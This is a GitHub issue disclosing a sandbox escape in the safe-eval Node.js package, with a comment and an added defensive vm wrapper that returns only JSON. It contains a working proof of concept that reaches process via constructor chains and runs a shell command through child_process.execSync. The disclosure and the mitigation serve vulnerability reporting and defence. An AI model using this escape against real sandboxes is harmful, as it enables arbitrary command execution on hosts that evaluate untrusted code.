Sandbox Escape #19

Open
a0xnirudh opened this issue Feb 28, 2020 · 1 comment

The following script can lead to safe-eval sandbox escape (node v12.13.0):

```js
const safeEval = require('safe-eval');

const theFunction = function() {
   const bad = new Error();
   bad.__proto__ = null;
   bad.stack = {
      match(outer) {
         throw outer.constructor.constructor("return process")().mainModule.require('child_process').execSync('whoami').toString();
      }
   };
   return bad;
};

const untrusted = `(${theFunction})()`;
console.log(safeEval(untrusted));
```

Inspired by @XmiliaH's vm2 escape.

a0xnirudh mentioned this issue Feb 28, 2020

S4lt5 commented Aug 3, 2020

@a0xnirudh Appreciate the POC. I knew you could get mainModule but did not realize the require call was so straightforward.
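
In the PoC in the opening post, the `match` method on the returned object receives an argument (`outer`) whose `constructor.constructor` can see `process`. The block below is an added example, not code from this thread or from safe-eval: it lets only a JSON string leave the context, so the host never calls a method on, or inspects, an object built by untrusted code. The helper name `evalToData`, the 100 ms timeout and the sample expression are assumptions made for illustration.

```javascript
const vm = require('vm');

// Hypothetical helper, not part of safe-eval: evaluate an expression in a
// fresh context and hand the host JSON-decoded data only.
function evalToData(expression, timeoutMs = 100) {
  // Null-prototype sandbox object: the context global has no host
  // Object.prototype behind it.
  const context = vm.createContext(Object.create(null));
  // The expression is embedded as a string literal and evaluated by the
  // context's own eval. JSON.stringify also runs inside the context, so any
  // toJSON hook or getter executes there and sees only context values.
  const wrapper = `JSON.stringify((0, eval)(${JSON.stringify(expression)}))`;
  let raw;
  try {
    raw = vm.runInContext(wrapper, context, { timeout: timeoutMs });
  } catch {
    // Never read properties of a value thrown by untrusted code.
    throw new Error('sandboxed evaluation failed');
  }
  // typeof runs no code on the value. Anything but a primitive string
  // (undefined, a function, output of a replaced JSON.stringify) is rejected.
  if (typeof raw !== 'string') {
    throw new TypeError('result is not JSON-serialisable');
  }
  return JSON.parse(raw); // plain host data rebuilt from text
}

// Constructed sample: a returned object shaped like the one in the PoC, but
// with a harmless method body.
const sample = `(function () {
  const e = new Error();
  e.__proto__ = null;
  e.stack = { match(outer) { return 'called by host'; } };
  return e;
})()`;

function demo() {
  const out = evalToData(sample);
  // No method from the context survives the JSON round trip.
  return {
    hostObject: Object.getPrototypeOf(out) === Object.prototype,
    hasMatch: typeof (out.stack && out.stack.match) === 'function',
  };
}
console.log(demo());
```

Node's documentation states that the `vm` module is not a security mechanism, so this narrows one channel and does not replace process-level isolation for untrusted code.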
